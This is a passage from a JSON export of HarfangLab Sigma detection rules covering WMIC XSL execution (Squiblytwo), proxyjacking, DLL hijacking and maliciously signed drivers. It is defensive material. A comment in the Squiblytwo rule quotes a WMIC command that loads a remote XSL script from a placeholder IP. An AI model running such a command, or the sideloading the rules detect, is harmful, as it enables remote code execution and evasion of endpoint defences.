"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.596004Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmic",
"https://attack.mitre.org/techniques/T1220/",
"https://www.netskope.com/blog/you-can-run-but-you-cant-hide-advanced-emotet-updates"
],
"name": "t1218_squiblytwo.yml",
"content": "title: Possible Squiblytwo Attack Detected\nid: 1a6ba792-4593-442a-9a80-d38ce5e97360\ndescription: |\n Detects the usage of a custom formatter to gain remote execution through WMIC execution.\n WMIC can take an XSL script to format the data, which may execute a malicious JScript. This technique is also known as Squiblytwo.\n It is recommended to check for suspicious activities by the current process or any of its children.\nreferences:\n - https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmic\n - https://attack.mitre.org/techniques/T1220/\n - https://www.netskope.com/blog/you-can-run-but-you-cant-hide-advanced-emotet-updates\ndate: 2021/02/08\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.defense_evasion\n - attack.t1220\n - attack.t1218\n - attack.t1059.007\n - attack.t1047\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Script.XSL\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n # wmic os get /FORMAT:\"http://xxx.xxx.xxx.xxx/keswD.xsl\" (Koadic)\n selection_1:\n - Image|endswith: '\\wmic.exe'\n - OriginalFileName: 'wmic.exe'\n selection_2:\n - CommandLine|contains:\n - '/format '\n - '/format:'\n - '/format :'\n - '/ format:'\n - '/ format :'\n - \"/'format':\"\n - \"/'format' :\"\n - \"/ 'format':\"\n - \"/ 'format' :\"\n - '/\"format\":'\n - '/\"format\" :'\n - '/ \"format\":'\n - '/ \"format\" :'\n\n exclusion_fp:\n CommandLine|contains:\n # Builtins formats\n - '/format:list'\n - '/ format:list'\n - '/format: list'\n - '/format:table'\n - '/ format:table'\n - '/format: table'\n - '/format:CSV'\n - '/ format:CSV'\n - '/format: CSV'\n - '/format:rawxml'\n - '/ format:rawxml'\n - '/format: rawxml'\n - '/format:mof'\n - '/ format:mof'\n - '/format: mof'\n - '/format:htable'\n - '/ format:htable'\n - '/format: htable'\n - '/format:hform'\n - '/ format:hform'\n - '/format: hform'\n - '/format:texttable'\n - '/ format:texttable'\n - '/format: texttable'\n - '/format:textvaluelist'\n - '/ format:textvaluelist'\n - '/format: textvaluelist'\n - '/format:htable-sortby'\n - '/ format:htable-sortby'\n - '/format: htable-sortby'\n - '/format:value'\n - '/ format:value'\n - '/format: value'\n - \"/format:'lib/csv.xsl'\"\n - '/format:?:\\Windows\\System32\\wbem\\' # /format:C:\\Windows\\System32\\wbem\\en-us\\csv\n\n exclusion_meshagent:\n # C:\\Program Files\\Mesh Agent\\MeshAgent.exe\n # ?:\\Program Files (x86)\\Mesh Agent\\MeshAgent.exe\n # D:\\MeshAgent.exe\n ParentImage|endswith: '\\MeshAgent.exe'\n CommandLine:\n - 'wmic diskdrive LIST BRIEF /FORMAT:?:\\Windows\\system32\\wbem\\\\??-??\\csv' # (fr-FR, en-US)\n - 'wmic PATH Win32_VideoController GET Name,CurrentHorizontalResolution,CurrentVerticalResolution /FORMAT:?:\\Windows\\system32\\wbem\\\\??-??\\csv'\n - 'wmic CPU LIST BRIEF /FORMAT:?:\\Windows\\system32\\wbem\\\\??-??\\csv'\n - 'wmic PARTITION LIST /FORMAT:?:\\Windows\\system32\\wbem\\\\??-??\\csv'\n - 'wmic OS GET /FORMAT:?:\\Windows\\system32\\wbem\\\\??-??\\csv'\n - 'wmic MEMORYCHIP LIST /FORMAT:?:\\Windows\\system32\\wbem\\\\??-??\\csv'\n - 'wmic ComputerSystem get PCSystemType /FORMAT:?:\\Windows\\system32\\wbem\\\\??-??\\csv'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1a6ba792-4593-442a-9a80-d38ce5e97360",
"rule_name": "Possible Squiblytwo Attack Detected",
"rule_description": "Detects the usage of a custom formatter to gain remote execution through WMIC execution.\nWMIC can take an XSL script to format the data, which may execute a malicious JScript. This technique is also known as Squiblytwo.\nIt is recommended to check for suspicious activities by the current process or any of its children.\n",
"rule_creation_date": "2021-02-08",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1047",
"attack.t1059.007",
"attack.t1218",
"attack.t1220"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1a7b3a94-a404-42ce-ba50-a9808950b58a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.597287Z",
"creation_date": "2026-03-23T11:45:34.597290Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.597298Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.cadosecurity.com/blog/from-automation-to-exploitation-the-growing-misuse-of-selenium-grid-for-cryptomining-and-proxyjacking",
"https://www.trendmicro.com/en_gb/research/23/b/hijacking-your-bandwidth-how-proxyware-apps-open-you-up-to-risk.html",
"https://attack.mitre.org/techniques/T1496/"
],
"name": "t1496_traffmonetizer.yml",
"content": "title: Traffmonetizer Executed\nid: 1a7b3a94-a404-42ce-ba50-a9808950b58a\ndescription: |\n Detects the usage of Traffmonetizer, a tool that allows users to monetize their unused Internet bandwidth by sharing it with companies or services via a peer-to-peer (P2P) network.\n Attackers can use this tool to perform Proxyjacking, a form of cyber exploitation where an attacker hijacks a user's Internet connection to use it as a proxy server for malicious purposes or illegal monetization.\n It is recommended to verify if the usage of this tool is legitimate.\nreferences:\n - https://www.cadosecurity.com/blog/from-automation-to-exploitation-the-growing-misuse-of-selenium-grid-for-cryptomining-and-proxyjacking\n - https://www.trendmicro.com/en_gb/research/23/b/hijacking-your-bandwidth-how-proxyware-apps-open-you-up-to-risk.html\n - https://attack.mitre.org/techniques/T1496/\ndate: 2024/09/26\nmodified: 2025/02/18\nauthor: HarfangLab\ntags:\n - attack.impact\n - attack.t1496\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.NetworkActivity\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n CommandLine|contains: ' start accept --token'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1a7b3a94-a404-42ce-ba50-a9808950b58a",
"rule_name": "Traffmonetizer Executed",
"rule_description": "Detects the usage of Traffmonetizer, a tool that allows users to monetize their unused Internet bandwidth by sharing it with companies or services via a peer-to-peer (P2P) network.\nAttackers can use this tool to perform Proxyjacking, a form of cyber exploitation where an attacker hijacks a user's Internet connection to use it as a proxy server for malicious purposes or illegal monetization.\nIt is recommended to verify if the usage of this tool is legitimate.\n",
"rule_creation_date": "2024-09-26",
"rule_modified_date": "2025-02-18",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.impact"
],
"rule_technique_tags": [
"attack.t1496"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1a8169a6-7d34-4131-9f89-3783ecb9ae0c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.601095Z",
"creation_date": "2026-03-23T11:45:34.601098Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.601106Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_ieunatt.yml",
"content": "title: DLL Hijacking via ieunatt.exe\nid: 1a8169a6-7d34-4131-9f89-3783ecb9ae0c\ndescription: |\n Detects potential Windows DLL Hijacking via ieunatt.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'ieunatt.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dbgcore.DLL'\n - '\\dbghelp.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1a8169a6-7d34-4131-9f89-3783ecb9ae0c",
"rule_name": "DLL Hijacking via ieunatt.exe",
"rule_description": "Detects potential Windows DLL Hijacking via ieunatt.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1a8b04c9-09a5-479f-8bf1-4cf580c1eec9",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.097553Z",
"creation_date": "2026-03-23T11:45:34.097555Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.097559Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_w32tm.yml",
"content": "title: DLL Hijacking via w32tm.exe\nid: 1a8b04c9-09a5-479f-8bf1-4cf580c1eec9\ndescription: |\n Detects potential Windows DLL Hijacking via w32tm.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'w32tm.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\IPHLPAPI.DLL'\n - '\\logoncli.dll'\n - '\\netutils.dll'\n - '\\NTDSAPI.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1a8b04c9-09a5-479f-8bf1-4cf580c1eec9",
"rule_name": "DLL Hijacking via w32tm.exe",
"rule_description": "Detects potential Windows DLL Hijacking via w32tm.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1ab2fc0d-1160-461b-99f6-f7936f152d34",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.094714Z",
"creation_date": "2026-03-23T11:45:34.094716Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.094720Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_notepad.yml",
"content": "title: DLL Hijacking via notepad.exe\nid: 1ab2fc0d-1160-461b-99f6-f7936f152d34\ndescription: |\n Detects potential Windows DLL Hijacking via notepad.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/10/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'notepad.exe'\n ProcessSignature: 'Microsoft Corporation'\n ImageLoaded|endswith:\n - '\\cabview.dll'\n - '\\comdlg32.dll'\n - '\\cscobj.dll'\n - '\\cscui.dll'\n - '\\dataexchange.dll'\n - '\\davclnt.dll'\n - '\\drprov.dll'\n - '\\explorerframe.dll'\n - '\\mmdevapi.dll'\n - '\\networkexplorer.dll'\n - '\\ntlanman.dll'\n - '\\ntshrui.dll'\n - '\\p9np.dll'\n - '\\propsys.dll'\n - '\\shell32.dll'\n - '\\structuredquery.dll'\n - '\\windows.storage.dll'\n - '\\windows.storage.search.dll'\n - '\\windowscodecs.dll'\n - '\\wpdshext.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files (x86)\\Google\\Chrome\\Application\\'\n - '?:\\Program Files (x86)\\Microsoft Office\\root\\Office*\\'\n - '?:\\Program Files (x86)\\Microsoft\\Edge\\Application\\'\n - '?:\\Program Files (x86)\\Mozilla Firefox\\'\n - '?:\\Program Files\\Google\\Chrome\\Application\\'\n - '?:\\Program Files\\Microsoft Office\\root\\Office*\\'\n - '?:\\Program Files\\Microsoft\\Edge\\Application\\'\n - '?:\\Program Files\\Mozilla Firefox\\'\n - '?:\\Program Files\\WindowsApps\\Microsoft.WindowsNotepad_'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1ab2fc0d-1160-461b-99f6-f7936f152d34",
"rule_name": "DLL Hijacking via notepad.exe",
"rule_description": "Detects potential Windows DLL Hijacking via notepad.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-10-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1b15c2a0-d1d2-4628-a592-e6c9c314baff",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.625804Z",
"creation_date": "2026-03-23T11:45:34.625806Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.625810Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://blog.talosintelligence.com/old-certificate-new-signature/",
"https://www.bitdefender.com/files/News/CaseStudies/study/421/Bitdefender-PR-Whitepaper-IndEs-creat6269-en-EN.pdf",
"https://twitter.com/th3_protoCOL/status/1587823143854698497",
"https://blogs.blackberry.com/en/2022/11/romcom-spoofing-solarwinds-keepass",
"https://www.trendmicro.com/en_us/research/22/c/purple-fox-uses-new-arrival-vector-and-improves-malware-arsenal.html",
"https://twitter.com/pr0xylife/status/1595096438798696448",
"https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware",
"https://twitter.com/ESETresearch/status/1594937059348992001",
"https://twitter.com/jaydinbas/status/1646475092006785027",
"https://www.trendmicro.com/en_us/research/23/e/blackcat-ransomware-deploys-new-signed-kernel-driver.html",
"https://attack.mitre.org/techniques/T1553/002/"
],
"name": "t1553_002_driver_malicious_certificate.yml",
"content": "title: Driver Loaded Signed with Malicious Certificate\nid: 1b15c2a0-d1d2-4628-a592-e6c9c314baff\ndescription: |\n Detects the loading of drivers signed with a certificate that was used by malicious actors.\n This can be indicative of a malicious actor trying to evade EDR/AV solutions with a forged signature.\n It is recommended to analyze the loaded driver for malicious contents.\nreferences:\n - https://blog.talosintelligence.com/old-certificate-new-signature/\n - https://www.bitdefender.com/files/News/CaseStudies/study/421/Bitdefender-PR-Whitepaper-IndEs-creat6269-en-EN.pdf\n - https://twitter.com/th3_protoCOL/status/1587823143854698497\n - https://blogs.blackberry.com/en/2022/11/romcom-spoofing-solarwinds-keepass\n - https://www.trendmicro.com/en_us/research/22/c/purple-fox-uses-new-arrival-vector-and-improves-malware-arsenal.html\n - https://twitter.com/pr0xylife/status/1595096438798696448\n - https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware\n - https://twitter.com/ESETresearch/status/1594937059348992001\n - https://twitter.com/jaydinbas/status/1646475092006785027\n - https://www.trendmicro.com/en_us/research/23/e/blackcat-ransomware-deploys-new-signed-kernel-driver.html\n - https://attack.mitre.org/techniques/T1553/002/\ndate: 2022/07/21\nmodified: 2025/12/30\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1553.002\n - classification.Windows.Source.DriverLoad\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: driver_load\n product: windows\ndetection:\n selection:\n DriverSignatureSignerThumbprint:\n # https://www.bitdefender.com/files/News/CaseStudies/study/421/Bitdefender-PR-Whitepaper-IndEs-creat6269-en-EN.pdf\n - '7C496F5FE65803A45AD7BD8DA5F59B8548E08E0A'\n # https://twitter.com/th3_protoCOL/status/1587823143854698497\n - 'FDD415C4B8A6983CFA982ECABB6D9A55BFD9F623'\n # https://blogs.blackberry.com/en/2022/11/romcom-spoofing-solarwinds-keepass\n - 'F55B2365D9E837777B760305C78E674B686E5834'\n # https://www.trendmicro.com/en_us/research/22/c/purple-fox-uses-new-arrival-vector-and-improves-malware-arsenal.html\n - 'C7939F8303CA22EFFB28246E970B13BEE6CB8043'\n - '9E7CE1AED4A1C8A985D76BFCD65AC71BFF75430D'\n # https://twitter.com/pr0xylife/status/1595096438798696448\n - 'AAD723780CD440026A6CA0AA1E9D13D09F877E8F'\n # https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware\n - '848C69A831D3789FA2BF6D7A7C8591F80A8F7FCB'\n - 'A8F9B64E4C5CC2AFE5E82DC3C9F44A1BDA2ED4B1'\n - '520CD357E195B57E0BFE7AF87227F4C0737E6BDE'\n - 'DBEB38C344441CB35FF982D1301A1C3DF992E140'\n - '60EE3FC53D4BDFD1697AE5BEAE1CAB1C0F3AD4E3'\n - 'AF5A136DCCED63DEFC29502FEDE9BFF7E2C16A8C'\n - '3A1CE9C2EE30EE8D8883DFC5BF45FF0201C2AB5D'\n # https://twitter.com/ESETresearch/status/1594937059348992001\n - '6EF192CBD6E540F1D740D1BD96317ACAE8C6AF9D'\n # https://www.sentinelone.com/labs/wip19-espionage-new-chinese-apt-targets-it-service-providers-and-telcos-with-signed-malware/\n - '68FF94B5C77481CC3AB10A05F3C926711C9C5F93'\n # https://twitter.com/SquiblydooBlog/status/1660782805687865344\n - '84F120783C24B1300ADD782414901503AF2F964A'\n # https://twitter.com/jaydinbas/status/1646475092006785027\n - '6ADE753659F5624D5A5D747523F07E23CAD9E65C'\n # https://www.trendmicro.com/en_us/research/23/e/blackcat-ransomware-deploys-new-signed-kernel-driver.html\n - '9EEEF1B33142106A095364DD0B2BFC8A24A2A563'\n # https://www.virustotal.com/gui/file/56066ed07bad3b5c1474e8fae5ee2543d17d7977369b34450bd0775517e3b25c/details\n - '0DD4552A9AABC00F61E619F4812DAFADCAA48715'\n # https://blog.talosintelligence.com/old-certificate-new-signature/\n - '6BC9649368643760190234FBB8395F4CACC2C9CB' # WoSign Class 3 Code Signing CA - 绍兴易游网络科技有限公司\n - '8B91C4BA4546F16D407CEB58090E1C8D82CAF2AC' # thawte SHA256 Code Signing CA - 北京汇聚四海商贸有限公司\n - 'FE6885F629D920DCE90FB03F0DB7B95709811C0D' # thawte SHA256 Code Signing CA - 善君 韦\n - 'F981DB345F885899FAE9382D7D3BCAF75B1CE797' # VeriSign Class 3 Code Signing 2010 CA - Beijing Chunbai Technology Development Co., Ltd\n - 'C61A221389C98EE2FBC0E57A62DEE5A915E6C509' # VeriSign Class 3 Code Signing 2010 CA - Fuqing Yuntan Network Tech Co.,Ltd.\n - '7B69FF55D3C39BD7D67A10F341C1443425F0C83F' # VeriSign Class 3 Code Signing 2010 CA - Zhuhai liancheng Technology Co., Ltd.\n - '864FD20B322E8C7CDB0D7AA69C8475F09D602C3D' # VeriSign Class 3 Code Signing 2010 CA - Baoji zhihengtaiye co.,ltd\n - '85C58500333C98954160FCA3EE9A26B659A5F451' # VeriSign Class 3 Code Signing 2010 CA - Jiangsu innovation safety assessment Co., Ltd.\n - 'D715230B535C8937B469632EC6158761FD18AD21' # VeriSign Class 3 Code Signing 2010 CA - Shenzhen Luyoudashi Technology Co., Ltd.\n - 'DF788AA00EB400B552923518108EB1D4F5B7176B' # VeriSign Class 3 Code Signing 2010 CA - Beijing JoinHope Image Technology Ltd.\n - '775141B89F48B71DADC19F13011A46E537E7029C' # Thawte Code Signing CA - NHN USA Inc.\n # https://twitter.com/1ZRR4H/status/1699923793077055821\n # https://bazaar.abuse.ch/sample/1fc7dbbff1ea28f00d8c32de90c2559e4aa3629d26627094e92ff111e1092875/\n - '21A97512A2959B0E74729BE220102AEF1DCF56FD'\n # Koi Loader\n # https://www.virustotal.com/gui/file/a43d460e43d27df91c02292c1e7d5d7920c2b3dc3b2749b1bbc7f28657588947\n - '2A0B1BEDF4CCC933A5FDB885EDA8211F9B258ABE'\n # https://www.elastic.co/security-labs/abyssworker\n - '0786E6A95B9B6FC9495F319AC2E334103AAB292F'\n - '811500AD165F66CAD3E607CD1253A5EDC91CB4D0'\n - 'D01B544CF4A4F901FA496BEA2B3A8F66F9583CB2'\n - '7749BE16F266669D505684E9F002C689706C4295'\n - '00F1435238447BBA9560E2A9A8C781861EBB15BC'\n - 'D36A5F40D62A4CCB0CFF098D0BBFAA30257D487D'\n - 'DA2CFA2262049049A7A2CA8FAF463669F19B8D5F'\n - '45D2D18BCCD270185F012271C1D6B7C890BA7C02'\n - '18760B486C35B6FF79EA5C461313DE2087353FEA'\n # https://x.com/tangent65536/status/1914373135337701588\n - '22EACBF575EA3FF19A6F639E80E8768405C9BDFE'\n # https://expel.com/blog/you-dont-find-manualfinder-manualfinder-finds-you/\n # https://www.truesec.com/hub/blog/tamperedchef-the-bad-pdf-editor\n - '99201EEE9807D24851026A8E8884E4C40245FAC7' # GLINT SOFTWARE SDN. BHD.\n - 'A2278EB6A438DC528F3EBFEB238028C474401BEF' # Echo Infini Sdn. 